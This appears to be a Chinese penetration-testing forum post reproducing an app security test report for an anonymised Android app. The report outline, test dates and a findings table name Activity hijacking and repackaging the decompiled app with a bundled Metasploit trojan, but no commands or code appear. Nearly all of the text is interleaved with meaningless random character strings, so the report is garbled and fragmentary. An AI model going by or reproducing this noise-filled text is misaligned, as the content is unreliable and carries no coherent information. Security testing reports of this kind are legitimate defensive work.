找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 原创-app客户端渗透测试报告之反编译捆绑msf马二次打包 ...
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 4220|回复: 0
打印 上一主题 下一主题

原创-app客户端渗透测试报告之反编译捆绑msf马二次打包以及active劫持漏洞

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2022-6-8 20:32:44 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
" A% l" f& e* m) b. ?# V7 r9 f" W" L4 K1 g

& u8 i6 l- |( v5 R' A ) s/ ~% Z2 `' v
0 g7 N& G1 Q% B: @2 A 7 }7 x2 m4 M' X' O! Z

" _' d2 L. M1 Q; \8 k2 z& h; y9 K: e8 w" x6 i# ~
% K. z. i7 Y" X2 o : _3 X9 G5 e" G W: t. \4 W: }

! x4 A. U% ?- K" E" q/ k9 ]; } @. j- j* d6 @, l8 ^ 文档编号:                ' N: e# B4 p- t* x ~) M/ u% y / W/ w* M& v5 g4 [: I" }

- @3 `+ q, ^/ o$ p. e$ r" `* m0 Y % A! l5 h, H% U g! A- N

+ ?: Z b1 a f0 [( O7 G! U: C % p4 I" e7 N; ?   m1 B7 k6 ?+ h' Y , b# l( {1 T5 h- @1 O8 [; W- G

1 X% G3 Y- P$ |4 X3 p, N7 ?( d% {6 | n2 g. G+ `

0 q6 Q8 {- g5 i& Z% g7 a 6 B9 a; ^* u( j   & r' V' m5 ]9 T k6 L# A% I * Z. k4 Y/ w8 |) n% R+ F" {

6 @# E. z5 G! [9 m3 }4 ^# D4 Y 9 V1 _7 m1 U" W0 n8 E) T

8 i, y5 A6 V& B' J8 ~" x; e$ O( q * k" W; F! N3 t- C4 E5 P2 |   ' y9 `$ L' E9 L' g* w- _ 8 D( b8 {) A8 L! x

7 i7 w! |0 v' f6 t T Q! a/ } " i' W. N5 I6 W% y

" W+ x4 K3 h' K3 a% | & Z N- Q& U R+ S2 G# ~: [4 U6 A% c   , E: }/ h) Q' k0 X7 e( E2 f5 d$ Y * W, d. s. }5 Z7 `1 o% r

1 M2 ~2 M) S0 E. o, n/ H: l $ g1 \' ^3 _7 @) {

, \) h4 w$ W: K4 U* _- T. p & n0 w A: @% C8 j   5 M. z* Q7 z# p; X * d+ v- \( {/ y: X; R

* ~- |% E3 G1 a' |1 c6 q8 G" [- d6 P' z 2 v. q T9 m1 a4 W

3 o/ d/ C5 g' I( J- s3 u5 |: U4 V9 y+ p; ~5 m* z; t9 k) E 某某某APP渗透测试 8 u; s0 |- p6 D: T# z 1 w; `% i' v: a7 v

, Q, t* |5 m) @8 w3 v1 b ) I6 H! r ?) w/ U8 D3 p

! }/ d2 \- E+ B- ?4 G& |/ S 3 C0 [1 }; `! g/ a4 N   - q# l4 k0 ?/ l* T6 v0 u+ J , ?* o1 v5 C7 n D

n% v+ d8 d( I) _4 b- i8 N, V. A! x. C, a6 E

4 o! i' o! c. l. z( N3 @ X! S, p( y& v2 N; t   2 z2 p, J7 P# I, e 7 C+ f( H! Z! b: x l: f: O

6 ?8 ?! ^. v6 Y9 G) [. O - K6 f& h0 |$ h) F

: _: g3 f& m# D* F1 j4 R : ~( h5 l4 S9 q1 i" ~- S   . `& C6 e" \' p6 @. @ / f: C! [& ~2 r. \1 F% B

0 e4 y+ x1 g: x W. |2 r. r. l" |5 n# F/ h7 G& T: @& u

9 y2 B, j9 G$ |5 ?5 @. z x3 D 1 V8 n; U7 j9 s7 `   8 I, t6 ?' z( X1 [ : m2 K' X1 I9 R$ C. g" F& j7 x

, @2 s8 [7 ]% C3 N X ~5 j& ~. b; O7 q7 r

$ v% h; d- Y- B1 W$ I. ~ 2 W; Y2 Q, S' j% D+ x, b% V, w# O 技 术 报 告 5 \, s3 K; I( z) o z8 C6 L/ A 0 N) `7 J( n% m3 a) m

3 t& z( Q& a& K" k : ^) k( O1 F+ f4 c8 B1 J0 [0 s7 H

7 }/ Q p- l |" q2 E( X: T* J$ u% a, [& v2 ~& U" f# {/ I# l" X e/ F4 c: e   + i! o( p! c' w" X8 ]9 R: c+ Y* u, i8 O5 {( o

- @, s: ~5 R! d$ p Z A H+ c2 D! V2 G, C: n) ? J

+ w- ~+ K/ |3 Y. p. b( ~& U ; k* Z. |% S$ J& S   0 _- |, h, b# W2 u0 E) U6 @" J# }* t ) p' ~' I3 j9 B* O

) k+ o% r- M0 F5 `( U - q C' c. w9 t9 q

" p$ r4 h) }1 R+ E( f. B7 M 2 o. s/ k; ~7 r* f: v, }   ' J6 |8 M, B5 y& M, V) @" [ 9 G- r# P3 B# S6 x( h" x2 _

; f: K8 R) _7 I 2 C) i _& [" f- G0 ^$ ^

# b4 B+ ~/ u4 W+ f$ J. A" n6 W; k# y2 w% P. R0 `5 q   9 G. o# S% G1 i & [' i! C' r; `3 ~! u" |+ p

9 {9 \' u s; P8 R 7 h% X: R Q; A6 T) u+ X

1 `. a1 K2 V; u2 _. \- y: O6 n# ]$ A* d   - N2 [; d2 o2 H3 A) p5 p ) \; E9 B3 y7 H0 t. i6 p

% Y: h5 I. a$ a6 P2 t" E( K7 d5 |- x, H# p8 A. p- h( N' o- A9 e* d

$ b6 P6 b+ v) S! y& y( ^8 P* h/ s Q% w- v1 o/ o   : R4 l$ R# v* o( | ! N8 k+ n( Q" @

( y+ I2 q& D! T # ]0 r4 B7 Z! @5 H

$ D `4 \3 y* r: k6 f2 H& c+ D * z5 C9 H) [+ J- ~% G9 p% B   * t7 v1 s& t) E# b1 p 3 c7 w# R- N' R- T4 g7 l% B$ S4 ?- K$ F

. I+ u9 _& |0 g. _/ | ) {- V) s0 b% d/ _+ i

& Y8 t* u) }; s/ T8 h: K) o * `8 ^+ `& J& a& O0 B$ V   - \% k/ J9 z P1 s/ K " }* X ?0 V* f' B3 Q% j3 H0 U

. I7 `8 Y1 V# q+ m7 T2 P 1 r7 }9 n/ N1 |! Q! @# W

* t) g0 Y4 \2 H0 Y- M ; d8 E4 b5 y) k, c: [: }2 A H   + ~. A- |5 |6 k: K9 _; y3 U- O; Y" ]

+ t8 h4 D; E( U5 ^9 q( w; w d , T) n6 K1 K# Z

9 C, { B! K- V1 g2 { , q" h4 P: U2 |4 f' i t   $ m) w6 M6 n& w% Z7 ? + p) F) s8 \' Z

. Y, [$ V5 W- s7 W& W 7 L& n/ E3 r0 H8 [5 A

3 J% X: x. k" }4 H$ E 4 x: J5 w _3 {3 b8 q# `   2 i2 {/ n K8 C; A' Z7 c! g1 j 4 V5 S B8 T1 K: q

1 K7 f" F8 E' V 5 C* B) I$ s5 I+ Q

5 K1 S/ B2 s) l3 Y) s 0 o9 D- ^" ?: Q   0 ]' s3 {8 \) v9 Z# L* m0 D 3 e. q" n$ s" ?% S

# M2 @/ U; N1 l& r) y: f& I 4 ~" n; m4 D" M$ ~

1 g, W& z2 p% z; ~8 k! Y% n) b" t) l   9 S5 Z5 B( {2 {3 j* ?/ ` : B2 W( ]3 Q$ [! ~( |% \* h

# v6 \: a1 O2 u" B9 ?# q , y. v0 M9 {/ ~7 }: n3 F

% l8 k& m; B! ^3 r- z1 Q# K 2 }1 a+ S0 h% q b9 s3 s% L   9 c8 e8 E- Z4 t, s1 w. ` ' k! s4 y8 H8 r8 o: s

1 Z/ N; Y/ u* z% R% ~ 9 m- z* h6 A/ j2 M, E1 c$ n' r

$ R" H4 |! N) }9 c" F; p ) ?" R& t/ x) _7 E: C   + |! ` b, C. G, u/ n/ H; m# c1 i ) d/ ]6 {; e0 Z0 c

, I6 ?" Y" m2 G5 E" d9 a ' v& @: e* ~( h6 J* {

/ L. C0 ^" [7 x; ?- I l: Q5 k1 p8 ?; y, e   8 n4 T/ P3 ~8 ]% o0 e0 u1 D7 l4 o, f4 }( R$ F

/ ?& z& `. y" o/ h0 M: u' s8 ?! k/ }( o- P) j

; X# B" U8 ]$ Y3 d5 P & h2 u l2 U: m; `2 }7 a   6 x% Z5 J* l7 ^3 O7 O3 N( i ( l1 o4 a# K4 j( u7 L* s- R g

5 p9 t! f% P! t $ I) ?/ `4 }5 _% R7 V

' P+ U( Q' c4 z' a" n! x2 E g& E. a' b. r/ _( f   / K' ~! G! \- w L K% d/ [& I* X1 X

" T& w4 C- X7 e, W. I2 c% A3 ^7 [8 L1 O9 g7 X6 ]- F1 X

0 Y/ ~. F! q$ t. @ . t& f1 @6 z/ w 二〇二〇年 ( f2 ?" i+ K. e, d! D5 S5 X. B

! a$ @0 K0 w* p3 u/ |# x1 T : U+ @# o; O, l
2 C9 j0 q. j9 z; x) K6 \8 ? + y( Z0 U4 H& d# x3 _6 j4 Z: O1 k
1 T+ T7 W8 i. I' I ' j0 Z1 o( p# W% u" Z9 K ) e9 }7 o8 a9 s2 }! m( U5 A$ X9 m, `( y# b+ s; N( z# @
1 J5 y: {! C2 x7 _9 M+ r- t8 v * w; p/ ^. l/ D, d5 ^
@) G) _; T" [ ' @) V" X+ @# G/ b
4 W( h7 a u! e, H+ H, h9 H; d. ~1 V5 K0 p& Q/ E' \0 ? " d/ l: g3 S! y0 W( _2 e0 F" z s# Y8 o" j
1 E6 Y+ T* A% T, P* W. Q : l8 e4 U1 o9 V. F, O, i/ G

3 N. T x+ d5 o) f* n" |6 y" O& ]9 B! T N! o; Q F+ A8 T 目 录 ! u1 h4 \; h8 p. L, L ( s2 ~; ]3 Z# g8 a" ?

7 R/ {$ j1 A% Y0 l# y& ~ 1 q1 z- W; D+ E; _; d6 }$ P 6 \1 N, y5 f# n- e S + \6 h, T! ]6 K- _/ w. I' n

/ _9 f! F+ x7 w& z1 y0 l1 C+ M" q9 G5 H9 n   6 j) g2 l# ~& Q , P9 F: q8 h# q6 h

5 y; n; E+ w3 X+ a0 u. j8 O$ k) K% c# x Y7 q' @; P' \7 r3 e( G

1 L& Y( g; [* e+ t) T0 p ^& Z7 O- m) ^7 m" X. g% e, {8 B 1 概述... 3 ( J5 W% u) ~- ?* @ ; d# Q+ o/ f9 `7 y

+ e5 W9 h# i4 {4 X B" C1 k$ [5 b 0 G* q2 }7 u2 w: D+ X# ]

6 |0 `& G0 P9 O $ o5 l8 `& G4 f0 t& n4 D. s 1.2测试时间... 3 # Z' \8 {5 q/ [ # H' j: r- Y, @/ o- H0 o: I

b6 h9 G% J6 j9 l' a% K+ p8 T7 u& b

, X5 E f8 N" f8 l ! X# m1 e& ?% U4 d3 _# f 1.3测试对象... 3 , j- D6 [: S+ R9 p6 _. Z # c$ f* B z. z3 [: z

1 u; p; x7 h' L) w8 Q , E# O8 o8 ?# F

( H( h5 T: S" U+ \; B/ h7 Y* M( w' J3 w* s: ?) X 1.4测试结果... 3 , l4 k6 M! o- {/ k2 {7 z ) l0 q; H2 u* X! t# ]+ Q

( V7 @# P7 I' {+ W6 A5 K 7 h1 i. J7 i6 ~) }* ]

* J" ?0 |) L8 w2 M( F' ^ w 8 U! F+ l1 t+ `- Z1 z# y2 | 2 检测结果... 4 ' Z9 U/ n$ g+ U. ~, N9 G: u, k: @$ T P" R

- A% R3 L H8 ^+ n2 b; C$ |, z+ X% L % A' r0 ^& ]9 s6 W

' g7 |" T$ `- o2 e3 V' n . S% a/ f `* W- C. C 2.1 某某某... 4 - O, f8 O W& ~: i- u" M4 F % l# v. W Q4 x6 y9 ~" [' G1 e

u- A: D6 S1 Y# l 9 p3 P; O& h+ O4 c, ]

% c W! {# }! c+ D" O2 C & `" ^( P. p: T% _2 _ 2.1.1检测目标... 4 2 v* B" d: i0 Q) t 5 W# q; q+ _- |

* V8 g) U+ P B e # L0 P6 r0 b$ ^% c, w

' K. U; s* u, H( h1 }* r " M* p8 X5 p1 N& x 2.1.2检测结果... 4 . P/ c6 z% i% C+ p ) }2 `, \. L2 O5 ~

& H4 h' u6 l* r% T! N 2 T! \, p1 B7 d- f& v! e

C$ u' u8 A' a( a! N1 r9 M: ~ & ]* s, `# H6 i$ S 2.1.2.1. 4 ! `! l+ t8 c9 y' w( Q $ q% P2 U' d4 L! y

9 i7 V' K8 q) B- F1 q# p0 E( z

, {. P6 k g# T ! e3 k3 I+ }$ @1 [ 2.1.2.2. 6 : V. Z: D( `' G+ b9 c8 S ' I# P2 h# g, y: x

5 ?: T ]+ Y/ O/ | % D) R. I6 \2 v# a5 k' s1 x

! w' |* M/ W4 Z- ]- M6 D" } : @6 t2 }9 h: M/ \4 ]# t& N 5 W; N- s; m" J( k4 s- T 9 i" J; Q9 ?3 ?" d8 U; Z* A: `

9 K) o5 c& P4 o( m 0 |3 w5 T, o9 C2 N 8 M" _$ v7 x2 ~! D2 D+ X3 z " I$ ] x. v( B& {* w
" n: T9 g6 k7 \/ ^6 D! M4 W 1 b1 c: u" h9 c2 J
0 S0 h; h' Y U4 u* G2 { . _' T# o( @9 N ) H( O# R4 B# q0 B/ t* z 7 L5 D7 }! a/ B% V0 v% k* N

$ z5 S7 N. ~+ ?$ _: J8 L . D- N# _( H8 J 1 概述 $ c1 p$ m+ f8 e- @& F/ I4 j; ~; T. M" y- W6 M }- T* r$ `/ {

) u3 }" b9 L T2 \* _ / L3 _! I8 {& r% w) C2 P) u

8 J- i1 H/ ?9 u/ D9 P$ H6 ~) X* A) n& o* K, g% j" H 1.2测试时间 ) w, ]7 M7 _* m' ~) Y1 B7 b& O # e$ z& ^- B4 _

' M8 { Y/ k2 b7 J' _- i/ S# c- ?/ \0 g# W % V3 v) }7 B' H( g( r, W* v+ z: B. m& f3 F( Z2 r* G: N8 J7 x' m5 D( p* S% r" M' @. C6 V. f5 E9 z/ n6 A$ S; P/ w* n# d3 K2 _/ {5 `: K8 }; ^( \( \. D5 y, o0 x' _3 j5 T$ x& i0 O2 w3 `- s y$ t) f. L/ }% M* G& c. I2 g+ S) j2 Y2 b% h! d8 w3 Y: i: ?) P: O( P' ~" R' P2 o" L M2 x2 h/ P. b9 ?# D) }& j4 d4 f5 V0 z) M3 y3 |+ r( q4 D8 O/ m. g) W2 H2 d; B) m ]7 S9 o& S; w+ f% i* q! f" C* c6 Q' {# t6 H0 i. ?% u! X, Q1 u1 z, l% ~- }0 g, Y9 F9 `. p; R* d8 |3 {- ]7 H8 ?- J# w: r: S) n" W }* g2 }( O; R3 f4 J. l5 L9 `6 x% f, ]4 n3 _5 b+ x0 ~) _* Y1 L& O) ]8 j; {$ f5 I. c3 I' B; j8 _/ b0 I" [3 [4 J( I+ ]8 I" C- i1 M& f# ~$ u( _ ?& q/ `# X% k
# v6 t# K9 b: W6 R: U1 j* r9 b: U" [

" `* t+ k1 d' `7 I# L( j6 v( M& g+ v; g* I3 F 渗透测试时间 + P1 |, c1 f H, M f9 F+ b / T+ L4 V7 s1 w. g; J8 s4 o- P

& w. ?3 k1 H2 A# k ) _/ h6 T* Y- A i6 D
( T" L( T+ r0 Z5 B, L# E# j6 T; z+ U4 ?$ F) D

A( _% j3 \7 H* }7 G # J+ m1 l- z4 _ 起始时间 9 w8 A& Z2 v$ V: R $ x |( S$ q4 v; I; a( i I8 y

& Y8 L$ [4 \/ M% ` ~+ m $ p* N8 R- c7 F$ o. f' `# E 		- ^( S) l) i2 M5 H7 [6 {( n, v8 M & l" d+ s, z- [' i9 \

* O$ d' r: P6 y9 ], G) Q @3 N ^ * d7 j! S" B0 t, S3 C- A1 p 202046 # p( U3 ^. [* N4 Q% f+ j 5 M2 i' T; Y" x# N$ M% d

: d {5 x# j$ `, S3 e $ [/ O( H3 [0 O% g$ ~
, Y% _: R/ T( S6 F7 x: N " z8 Q; ~1 k8 |# u& o

' U7 m; J/ k! u! W2 j ) s% i* C* m6 Q3 z( X, B$ ? 结束时间 " s) v/ d2 u) s' m, A+ R' ^" O7 Q) p3 O7 l! p0 C9 W

0 L% {2 _( D+ [6 H2 j 6 x' |8 Y9 r: Z& V$ v: | 		& B& D4 Z b( T " I5 D/ f; V. B% h; f% ~. A# i1 B

" c- b, w( r% p% u F ) K1 f$ P" s# ^1 Q$ T, Z 202049 - t9 v' K: D; C' }. \- @ 2 Q( r6 T$ r$ S* b

& h& T- V9 E( K' V % y9 J2 n' j- `7 L( o$ h r6 e
" r; o7 P" O% a. P5 n* r' f [4 \% w. O! @! {

) S8 ^* ^& U) W2 b ' y- X' s; |1 T8 G7 }* N' k 1.3测试对象 1 X N( Z" |& m0 m 3 t" s T2 v5 L7 J! F1 |

n' F' a: n6 Y8 i& U2 E+ L0 A# e/ ?/ D- J: l. b- j4 r' U- `

0 W% w8 e: r% V( [- x $ n7 _: i( N- @0 Y 此次测试目标为某某某安卓APP进行渗透性测试,APP存在安全漏洞数量如下表所示: 9 |/ f3 ^' e3 D$ v! E% w6 ~8 r# K - Z4 J4 o0 z3 Z( u

; R1 P& Y; X, g# A" a ( j2 i* P7 L1 S! M8 T6 r

, W$ u4 B. @1 c. _: u" k! ] 4 P3 e) K1 c' @( r6 a 1-1 检测对象 ( i& G* N' E7 w: {7 ^8 R" X# _ # y1 g4 ^0 d1 X" ?

0 U1 `7 q, l! B A8 d* j4 A6 s( M' a7 d+ O B9 W: i+ A* R& b! D 3 P( D3 \5 B3 Y& c4 ~9 H& `. \: r/ [6 |: r5 o2 ]$ G: F( {# ~8 [' Q! z. t& e# t7 K$ h1 s3 q( d* b, L* |9 I7 g* k( l* N7 v" t5 l% ^1 o/ E( }5 k9 O+ Q1 f6 }* q5 W6 W6 e' z K( M* Q% h* K, u$ F& ^5 A2 @& V; |& F, v b3 M5 A' S* \# a" w+ m9 m+ [, B- u" m7 ]: E: H! G& R- g R* F/ O, C# s& M( \9 u& `8 \$ S1 @! U' D4 B7 C# b4 a3 `/ O6 d/ k5 _2 f( `! G1 Y) i+ @' u; t8 e5 H3 m7 B6 {4 L' C4 Z+ j/ O3 L/ }0 n1 ? D! \3 }, u3 y# O% j! r& h7 }% ^$ u/ S, O1 }5 ^# {9 L0 u( D$ t, Q0 U* \1 j" w1 K# X9 r% B% h8 |8 `$ L" P4 D* D. s7 U8 l, ^( }2 X4 k; Q1 m2 u+ i$ D4 l7 ~! c6 I6 G( I8 u7 t, H+ ]7 j9 G4 A# Z Z0 k% x+ O. N6 R7 p. A9 f# p1 u" c/ `, G( E) R* G) Y, a& m: `4 ]7 B8 t; q$ r' F" G0 Q; f' _8 m3 s2 f8 N5 p% @- R7 f+ E' E) N5 e1 N2 P
9 L6 \% o Y( I9 r: r6 O }/ A1 h2 H" l$ t* ^" K' c5 Z

% c) Y* ?/ u) ?* V, o( H 3 w4 \2 @$ p/ Y. t q 序号 $ i% s1 a) N- u \) G+ I/ [/ f- A: N2 Q/ L5 ~1 w4 A2 I

8 C6 a) L7 B# B& o% D: Y6 H 7 O% B: Z' Q- Y 		2 n0 A5 y$ G0 O: W& x" J4 q* { & U( a, e: I! Y- B( n

( D4 L: W3 T& Q / j0 v: k6 `" t 测试对象 & e4 v* L! H* c0 i% I- c2 y2 J: r1 I/ A* p% w

i; _1 u6 n. j1 c+ P- E9 [4 ]- A. w d( E 		; N6 |$ u8 k1 c% y5 a0 y3 { c+ r4 S4 |. C: j% h( P9 B' J4 M6 G- n

! |+ Y2 C! } v( @9 z7 C3 v1 Z _, P& p1 Z7 t9 ] 测试地址 % k8 ?6 n }* U- ?; F8 _1 d' W7 ?4 Q 1 H$ z/ `+ q* `, A$ I) @4 Z7 ^

9 G2 U; G& x5 `' W! l A: x/ D ) B( L3 Q6 u V9 o 		. S6 |0 H8 ^9 b5 ^' F$ e. h ; R9 D! {7 r6 ]" S2 L* Z

( L% G, l# s6 P% q/ N5 l: x& @$ a1 \& M 安全漏洞 ( l* C- Y& K7 j2 ]( F5 I! B / a+ ^) }+ q6 q

! ? U7 }- {, ]# j: \6 m4 Z# B4 _9 @) U" n" ]3 p
) \+ K6 H( _$ e % g+ ^- U- u8 G+ n9 m" o2 c) Z/ z

* t% g l+ @. X8 }" `5 r! D * S' V$ D% o$ _0 }; j) H 1 - y" Z1 R) l4 | ; ]3 ]9 V5 M5 \! f& j2 H. E4 _( t

; G: n- S% u- q A- z6 v5 } ' A: m2 `7 F, I 		+ |1 ^. G4 m' [ , c$ r% b! x! M# P/ Z* L

: G6 |) D" n8 d- U6 _ Y' c" E1 @1 Q+ | 某某某安卓APP 2 ^) i2 j- ~' v9 S7 m5 ~) p ! ]* E1 f- T5 q. k! _& N

" O3 ?4 V' y) [9 z H 4 I: q9 [2 f* D3 u% m% s 		: y; I8 D) x5 M/ F" u# N- f 0 x* e; c: t$ j9 a5 f" w n% W

6 o/ n3 O l2 T; U o/ J5 Y- j ! n1 Z _2 I. _- o" A( U# @) \   # f) i) Q$ C( k" i, p: v; w7 [# o) r- t$ r& m7 E" l

$ V! A: u$ t! i3 |: f9 u3 P + d8 v# M) Q [. Q1 Z& g5 K 		( F2 z8 L. e0 [4 e# z% i( Q! I 9 w+ z6 T+ w* O5 g W

D+ ]/ {) |: m }; m: T 1 B3 l$ s: b, z$ Q( ^9 L 2 ' ?; D O% ]/ y9 B$ n 5 W& |9 l1 X2 P9 C5 D/ a

! C( A5 _! J9 g4 s+ h8 b; F; M # `0 A c6 ~0 m) }
3 e& X3 ~% A0 K5 @4 c% E. c' H7 J! P2 L. n0 @5 X

- M! p1 b& q5 h. t* f- j( `* j& O% m! Q4 i! f: a6 q- d 1.4测试结果 " g8 R2 S' ?# u% Q* B* c& ?$ ^: ~* g4 e# F1 p E# Q# @

. K! l/ D$ g) x/ t $ I( ~$ V( b v, c8 x& s$ U1 S

1 u7 G7 F8 y! P/ A7 M 8 f3 K, n1 l! q d 在本次对某某某APP透测试中发现,APP安全防护存在一定问题,主要问题如下所示: " |: b4 d, @* |0 a4 t0 P; j1 b ; {. U% \4 U' Z0 k h0 T* T' U

3 R3 r) X4 y N6 |) V 7 R8 ~9 o& }9 I. J

* t# B3 F% b5 q) h) \" \5 ?- |8 L+ h/ U- `) E! s   * ~( @. i3 N, Y; H# z7 p4 |, V; i4 d

* b! ^, s' T9 `+ l9 ~# l 2 a( }4 \9 `) {1 a9 Z
: B! A" T" G" w$ |6 k& ^3 X 8 p8 {5 c. z! k1 | 4 n! F* @6 H, K' ~" e1 H. z$ d4 G/ ]4 }0 P; [) P$ U% u! m) @" R; {7 k" x2 L2 `4 p' n9 ^" ~, l3 Z6 n# ^& K6 X7 ]$ l( o# W* L' B5 s5 Z: `: V" O4 W K- T: [* _/ V7 B# r }4 `' y, i2 I5 D: K# A7 B" }7 }7 W" H4 _ `2 }6 p. K5 S- F& g" A; R: Z! C& } k9 P: ]+ o% v8 o$ G" C: R0 s/ C' `) E3 R c }, b7 M2 d0 B) ?+ E( e q+ {, O6 R* |$ h& C% W, I1 y/ A8 ^$ v' C4 O3 J5 q6 n% x6 g/ G" S9 l; ?6 x c9 k" A* j. v) K' {& u& p' f! B1 j$ x* X5 _3 H% o* V3 i% G+ v$ R/ C1 j& O+ M: D: c* K# u% E# l- {: p4 L! G+ X+ G+ ], G, @2 c. u8 t- M+ ?- }9 T z, O6 k" K! a+ ~ ~/ @1 _8 m+ C& Z4 Q" M8 D4 ?9 Y6 [1 _7 Y8 x# v$ ~8 o2 X9 e8 Z l+ A& t( j4 l# i3 y# i C% p' ?0 C4 i7 P/ }+ y( X/ j4 q# s) I+ Y3 \' n' r! n/ s7 l- O; s! ~( ~7 t. Z: @( Q/ y: a# \5 V$ X9 X2 x6 \ L0 ?/ e& J8 L1 S1 E- e5 `5 q! u4 Y, T* e; V" O: s1 c5 H+ o# b0 R x! }. }6 ?* @! U% G9 G+ t) n3 \% j M& E: N; T2 u0 \: |/ F$ k2 N0 W+ ?" ?9 S, d- a U( W1 ^6 n- ~3 N* ?8 A; U- z8 C7 G. q+ h" m- f3 y0 M4 |' |+ ^5 h5 ] G- c" c% p6 M9 U9 z- J' Q) |. [. S6 ]) D1 W4 c) M0 s' v3 Z/ w: {9 B& K! q* E2 p3 `8 ]2 ~' I7 R+ Q- H$ s: r" k8 C7 x2 L. z1 J+ @: N0 o8 [' z, G+ f; W/ @. _' z; ^% k4 j) w2 o0 n% L _) F4 [! M7 ]+ b6 L. W8 j+ [& v
! D# w% G7 G. G+ I8 s* I ( Q7 f% }7 f9 N. f( f4 J9 l

" h4 _/ c, D: a' S* @7 ^ 6 K6 N/ M% \* p1 Z. _$ H+ D 序号 ; C* q# e" Z9 t4 z; A 7 y% [' A; J( A3 E6 {

$ C6 ]& F) @+ O4 m2 ^ ' Z+ z& p* j4 L4 f' q2 Y& R 		$ d6 \; {8 I8 G9 Y& a3 l9 A) l& h8 j- F 5 _$ `. p: t6 k! `

! U& ^1 V1 r" ? + z( M; }) F. [8 y' o5 p! f% P" t 系统名称 * ^$ b$ V# E) `5 W( F$ m/ J: M + B# I: U5 V& Z

5 _/ }+ E, o: P; N9 j " q4 H3 \, \3 e! Q# v: S7 ? 		7 j; d& q/ c: O' N+ W ) R; S; b# E/ J/ H* P" o2 E4 c6 l

9 S: V* k" Y/ d. _5 m ( Q' N- y5 b+ q$ q 漏洞名称 6 g5 ]6 _' r' m; [" D 0 m2 ], c; Q3 Y

% @+ r2 k$ z' ^0 q6 [: a# b ; \" g) R' f. N2 m8 p 		- t/ b3 g4 o2 {0 \ x4 n: e6 Q Y0 U, D4 Y9 h

5 S4 d( E# D1 f0 s( g% u, w, n2 A, }5 \" D5 i/ l, l3 h! s 漏洞危害 " Z2 l2 w( d% c: R 0 b$ _/ f( n% w

1 P2 Y1 c& y6 X; d1 ?& G4 T4 B. `& A % C9 M! k* J: r 		9 v; D0 D6 }- V, j9 I" k 3 V9 {9 k. b8 f0 _% ^( `

- z. X6 \; b2 A/ w/ \: S0 L + U: n8 Z! I: `% ^: c 修复结果 ) O& {: [7 ]" C* R ( u& a7 B; t( T" N! [

$ |6 B4 H3 ~0 A' J9 p6 h ' y! T8 o8 w9 \
3 p7 b9 G/ a% g# o) M: d 9 e& n2 V' ]) e

* l+ A+ f& w$ F* {2 ]# f6 ]0 _ " |1 A' W4 X& u8 I2 S7 d4 O% D 1 5 T5 m- Y. z( b: }. @ ) [0 K* ]6 |& v/ y% O

$ N+ s" o- c; U: [/ r7 b + O2 N0 N" i2 }+ [ 		# [" E4 p, X2 _3 \ & N# X" X+ b; H, ^; w

7 M! ?% o8 y9 V : X% c4 Q5 E6 V+ V- t/ Y 某某某某某某APP ' f a- l I% o: f) ? , H" I; s3 G/ X( x+ M8 S0 z

0 [! e" s( ~$ J) q Q 4 b. b: g2 c2 S4 y& i+ |9 f 		6 J3 }# ^# ?6 t* A8 S2 t4 p & o8 _1 t2 _% n" Z3 @* c6 B

( |# @% ~; p0 ] [/ i 3 |# y% U6 w. K( m6 E5 ~5 E Activity 劫持 7 x0 T: J4 x2 t9 G- d8 k/ L+ Z8 s' l; @4 ]+ h

^0 P- |+ C/ ~; Y% D; x ~; p4 S- e y3 o0 n( q

+ k6 \8 J) `% A# }+ _ x& Z( ?" |) e   % l$ h: ^& f, \ 7 R- D7 M) L6 y# v

+ T Q) C' ]4 s+ Y- [! l l 8 t! E# y2 n2 j/ D' N3 X3 c 		& b7 q: a6 f1 r* W# Y ! N! n* o6 z2 B5 Y# K

+ R! Z$ |6 u+ W' a& s * v* g7 s. d5 Z0 d ! M2 H& [: Q& m" \. r! g+ v7 P, V0 t

Q- p! r9 p7 [ ! W( h5 }+ q+ B. s) v4 c 		: i6 D& n4 s5 a$ s - W% i3 ~/ ~+ v( g

& R% u' ~: m+ ~2 l, |+ p* R 3 D" _2 ]: ^& x1 j R! o7 }8 _5 J   1 ]5 N* M! M: _. h ' S. P! k) x% Q

5 _, p- N' i' T2 W e# x 4 t/ w" S& t F7 V5 j5 ~
6 b9 J- k7 K6 C1 }5 L9 y ; e; f( v3 V; q+ _, r' C9 @, A; h

8 N- U8 B2 D* x9 [4 q6 c 8 k7 w# B2 ?6 h0 F: D3 s 2 ! E/ J3 X" c7 s9 b" T! H i ) |/ @3 e/ I2 U8 p" d/ `8 N+ ^

% ]+ m- N$ g5 f" X/ Y& Q. o 4 G. B- k4 Z# l" D: R1 j 		3 A; }7 t) l7 ?. a( c ) k/ N. V- U$ m

2 x$ `- G; V7 Z2 i2 X ( [6 t' ^6 J/ t6 R6 b! E 某某某某某某APP $ l# a- \3 ~: V y5 F' Z# U x7 m' K6 l

9 n8 T/ f2 Q# c( T6 |, J V + h3 Z* q% }2 D; s 		8 q3 T* ]2 r/ W / U4 T' f3 ^# g5 P

. |7 e. Y7 Y. H- y! { ' ^1 H5 @- R( D4 M6 P; D 反编译二次打包捆绑木马、篡改APP代码 ; A$ V" K1 E1 Q$ H" O# D. }2 E+ K! t" K$ j! s

1 C% `$ Y1 A; ~$ z & k) R6 a1 M- ~* I# m Z 		* Z/ k1 h3 P! R% z 2 o& t7 N( y2 U4 D$ S5 u( y8 D) [

. q' u- Q, X: ?4 t ( X3 ^$ T1 x) p# j9 L* E 5 R* G0 R4 w, R% g4 T) @9 R" o! r- g1 k# x& ~+ V

[' v/ D& D1 t7 |! d) I3 y( ?' W1 M/ J! ]! ]+ @% n; j" a( R 		2 ^& p- x) Y; B' b' [ M, X$ G; K. ^( T7 [

2 [: L5 X |! W- T0 B4 u( L9 ^ " c |' o1 Y' J1 i' Z   ) Y2 M/ R/ A0 P! R7 d , R# Y/ N: k' d

! H! y; ?! T5 c% }2 G7 ~ ' Z% c8 R: N/ l3 J
; M! q" b4 W5 h9 T1 y7 F0 u5 H& V) i* Y7 T$ V3 Y
6 }# x$ {: n* `! n+ w6 g# p8 U! g. a# [2 m* }

6 [* v$ [* P. i7 j6 P) ?0 [5 Q % i3 k3 @5 e* p. Q   ) e; S0 N6 Q3 b3 W, v3 T 3 w4 v3 R& _/ {2 D9 C

& M* C+ _! I; q6 h+ ^$ \" x 3 g- l0 k1 D$ b T- L0 N9 T4 z

